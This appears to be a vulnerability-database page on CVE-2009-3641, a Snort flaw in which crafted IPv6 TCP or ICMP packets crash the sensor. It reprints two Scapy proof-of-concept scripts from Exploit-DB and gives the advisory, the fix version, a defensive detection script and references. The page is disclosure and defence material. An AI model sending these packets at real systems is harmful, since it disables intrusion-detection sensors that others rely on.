CVE-2009-3641 : Detail

7.97%V3
Network
2009-10-28
13h00 +00:00
2017-08-16
12h57 +00:00
CVE Descriptions

Snort before 2.8.5.1, when the -v option is enabled, allows remote attackers to cause a denial of service (application crash) via a crafted IPv6 packet that uses the (1) TCP or (2) ICMP protocol.

CVE Information

Metrics

| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 4.3 | | AV:N/AC:M/Au:N/C:N/I:N/A:P | [email protected] |

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 33306

Publication date : 2009-10-21 22h00 +00:00
Author : laurent gaffie
EDB Verified : Yes

source: https://www.securityfocus.com/bid/36795/info

Snort is prone to multiple denial-of-service vulnerabilities because the application fails to properly process specially crafted IPv6 packets.

Attackers can exploit these issues to crash the affected application, causing denial-of-service conditions.

These issues affect Snort 2.8.5; other versions may also be vulnerable.

You can reproduce these two different bugs easily by using the Python low-level networking lib Scapy (http://www.secdev.org/projects/scapy/files/scapy-latest.zip)

1)

    #only works on x86
    #/usr/bin/env python
    from scapy.all import *
    u = "\x92"+"\x02" * 6
    send(IPv6(dst="IPv6_addr_here", nh=6)/u) #nh6 -> TCP

2)

    # works x86,x64
    #/usr/bin/env python
    from scapy.all import *
    z = "Q" * 30
    send(IPv6(dst="IPv6_ADDR_HERE",nh=1)/ICMPv6NIQueryNOOP(type=4)/z) #nh1 -> icmp (not v6)

Exploit Database EDB-ID : 9969

Publication date : 2009-10-22 22h00 +00:00
Author : laurent gaffie
EDB Verified : Yes

=============================================
- Date: October 22nd, 2009
- Discovered by: Laurent Gaffié
- Severity: Low
=============================================

I. VULNERABILITY
-------------------------
Snort <= 2.8.5 IPV6 Remote DoS

II. DESCRIPTION
-------------------------
A remote DoS was present in Snort 2.8.5 when parsing some specially crafted IPv6 packets.
To trigger these bugs you need to have compiled snort with the --enable-ipv6 option, and run it in verbose mode (-v)

III. PROOF OF CONCEPT
-------------------------
You can reproduce these two different bugs easily by using the Python low-level networking lib Scapy (http://www.secdev.org/projects/scapy/files/scapy-latest.zip)

1)

    #only works on x86
    #/usr/bin/env python
    from scapy.all import *
    u = "\x92"+"\x02" * 6
    send(IPv6(dst="IPv6_addr_here", nh=6)/u) #nh6 -> TCP

2)

    # works x86,x64
    #/usr/bin/env python
    from scapy.all import *
    z = "Q" * 30
    send(IPv6(dst="IPv6_ADDR_HERE",nh=1)/ICMPv6NIQueryNOOP(type=4)/z) #nh1 -> icmp (not v6)

IV. SYSTEMS AFFECTED
-------------------------
These proofs of concept have been tested on snort:
- 2.8.5

V. NOT AFFECTED
-------------------------
Sourcefire 3D Sensor

VI. SOLUTION
-------------------------
A new version correcting these issues has been released (2.8.5.1) :
http://www.snort.org/downloads

VII. REFERENCES
-------------------------
http://www.snort.org/
http://vrt-sourcefire.blogspot.com/

VIII. REVISION HISTORY
-------------------------
October 14th, 2009: First issue discovered, advisory sent to snort team.
October 14th, 2009: Snort security team confirmed the bug.
October 16th, 2009: Second issue discovered, advisory sent to snort team.
October 20th, 2009: Snort security team confirmed the bug.
October 22nd, 2009: Snort team released a new version.

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
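A detection-side sketch for the two packet shapes visible in the proof of concept above, added here as an example and not taken from the advisory, Snort, or its fix. It flags an IPv6 packet whose Next Header is 6 (TCP) but whose payload is shorter than the 20-byte minimum TCP header, and one whose Next Header is 1 (ICMP for IPv4); the function names, sample packets and 2001:db8:: addresses are constructed, and the heuristic is inferred from the PoC's shape only, not from a stated root cause.

```python
import struct

IPV6_HDR_LEN = 40      # fixed IPv6 header size
TCP_MIN_HDR = 20       # minimum TCP header size
NH_ICMPV4, NH_TCP = 1, 6

def build_ipv6(next_header, payload, hop_limit=64):
    """Build a raw IPv6 packet (constructed test input, documentation addresses)."""
    src = bytes.fromhex("20010db8000000000000000000000001")
    dst = bytes.fromhex("20010db8000000000000000000000002")
    first_word = 6 << 28  # version 6, traffic class 0, flow label 0
    header = struct.pack("!IHBB", first_word, len(payload), next_header, hop_limit)
    return header + src + dst + payload

def classify(packet):
    """Return findings for one raw IPv6 packet (extension headers are not walked)."""
    if len(packet) < IPV6_HDR_LEN:
        return ["truncated IPv6 header"]
    first_word, payload_len, next_header, _hop = struct.unpack("!IHBB", packet[:8])
    if first_word >> 28 != 6:
        return ["not IPv6"]
    findings = []
    # Trust neither the declared length nor the captured length alone.
    available = min(payload_len, len(packet) - IPV6_HDR_LEN)
    if next_header == NH_TCP and available < TCP_MIN_HDR:
        findings.append(f"TCP payload of {available} bytes is shorter than "
                        f"the {TCP_MIN_HDR}-byte minimum header")
    if next_header == NH_ICMPV4:
        findings.append("Next Header 1 (ICMP for IPv4) carried directly in IPv6")
    return findings

# Constructed samples: zero-filled payloads, not captured traffic.
SAMPLES = {
    "short_tcp": build_ipv6(NH_TCP, b"\x00" * 7),
    "icmpv4_in_v6": build_ipv6(NH_ICMPV4, b"\x00" * 38),
    "normal_tcp": build_ipv6(NH_TCP, b"\x00" * 20),
    "normal_icmpv6": build_ipv6(58, b"\x80\x00" + b"\x00" * 6),
}

if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        print(name, classify(pkt) or "ok")
```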

Products Mentioned

Configuration 0

Snort>>Snort >> Version To (including) 2.8.3.5

Snort>>Snort >> Version 1.6

Snort>>Snort >> Version 1.8.0

Snort>>Snort >> Version 1.8.1

Snort>>Snort >> Version 1.8.2

Snort>>Snort >> Version 1.8.3

Snort>>Snort >> Version 1.8.4

Snort>>Snort >> Version 1.8.5

Snort>>Snort >> Version 1.8.6

Snort>>Snort >> Version 1.8.7

Snort>>Snort >> Version 1.9.0

Snort>>Snort >> Version 1.9.1

Snort>>Snort >> Version 2.0

Snort>>Snort >> Version 2.0

Snort>>Snort >> Version 2.6.1

Snort>>Snort >> Version 2.6.1.1

Snort>>Snort >> Version 2.6.1.2

Snort>>Snort >> Version 2.6.2

Snort>>Snort >> Version 2.7_beta1

Snort>>Snort >> Version 2.8.0

Snort>>Snort >> Version 2.8.2.2

Snort>>Snort >> Version 2.8.3

Snort>>Snort >> Version 2.8.3.1

Snort>>Snort >> Version 2.8.3.2

Snort>>Snort >> Version 2.8.3.4

Snort>>Snort >> Version 2.8.3.4.1

References

http://www.osvdb.org/59159
Tags : vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/bid/36795
Tags : vdb-entry, x_refsource_BID
http://securitytracker.com/id?1023076
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/37135
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=oss-security&m=125649553414700&w=2
Tags : mailing-list, x_refsource_MLIST
http://www.vupen.com/english/advisories/2009/3014
Tags : vdb-entry, x_refsource_VUPEN
http://www.openwall.com/lists/oss-security/2009/10/25/5
Tags : mailing-list, x_refsource_MLIST
http://seclists.org/fulldisclosure/2009/Oct/299
Tags : mailing-list, x_refsource_FULLDISC